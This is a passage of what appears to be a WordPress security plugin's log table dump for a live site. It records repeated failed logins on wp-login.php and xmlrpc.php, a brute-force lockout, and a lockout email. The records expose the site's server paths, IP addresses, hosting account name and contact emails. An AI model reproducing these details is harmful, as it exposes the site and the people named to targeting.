empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"39106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNSyeDEKCiNBjk42kcwzAAAANQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568887497.838\";s:12:\"REQUEST_TIME\";s:10:\"1568887497\";}}','notice','2019-09-19 10:04:59','2019-09-19 10:04:58',17743168,19234272,'https://bintara.com.my/wp-login.php',1,0,'213.32.91.71'),(25144,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"39328\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNSzNd7mFxrJDg7xkLyCQAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568887500.9399\";s:12:\"REQUEST_TIME\";s:10:\"1568887500\";}}','notice','2019-09-19 10:05:04','2019-09-19 10:05:01',18259224,19556288,'https://bintara.com.my/xmlrpc.php',1,0,'213.32.91.71'),(25145,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"46118\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNWLNAhg@A20WI2ffiL4AAAARM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568888364.8378\";s:12:\"REQUEST_TIME\";s:10:\"1568888364\";}}','notice','2019-09-19 10:19:26','2019-09-19 10:19:25',17740472,19232296,'https://bintara.com.my/wp-login.php',1,0,'68.183.173.177'),(25146,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"46610\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNWL@DEKCiNBjk42kcysgAAAMM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568888368.0875\";s:12:\"REQUEST_TIME\";s:10:\"1568888368\";}}','notice','2019-09-19 10:19:29','2019-09-19 10:19:28',18257544,19554256,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.173.177'),(25147,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"60600\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNdOuDEKCiNBjk42kc2iwAAANY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568890170.7299\";s:12:\"REQUEST_TIME\";s:10:\"1568890170\";}}','notice','2019-09-19 10:49:32','2019-09-19 10:49:31',17742552,19233320,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(25148,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"60869\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNdPtd7mFxrJDg7xkLzlAAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568890174.1436\";s:12:\"REQUEST_TIME\";s:10:\"1568890174\";}}','notice','2019-09-19 10:49:35','2019-09-19 10:49:34',18259192,19558848,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(25149,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"42124\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNg7NAhg@A20WI2ffiOQQAAAQ0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568891120.7589\";s:12:\"REQUEST_TIME\";s:10:\"1568891120\";}}','notice','2019-09-19 11:05:22','2019-09-19 11:05:21',17744664,19236256,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(25150,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"43288\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNg9Nd7mFxrJDg7xkLz4wAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568891125.7651\";s:12:\"REQUEST_TIME\";s:10:\"1568891125\";}}','notice','2019-09-19 11:05:27','2019-09-19 11:05:26',18256088,19556496,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(25644,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:33:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:33:40\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:48:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:48:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:33:41','2019-09-21 11:33:40',17884552,19289880,'https://bintara.com.my/test/wp-login.php',1,0,'62.162.103.206'),(25645,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:33:41','2019-09-21 11:33:40',18090272,19289880,'https://bintara.com.my/test/wp-login.php',1,0,'62.162.103.206'),(25646,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKrbfBTP0kPOVnb8jqeQAAAFY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.85.105\";s:11:\"REMOTE_PORT\";s:5:\"48684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";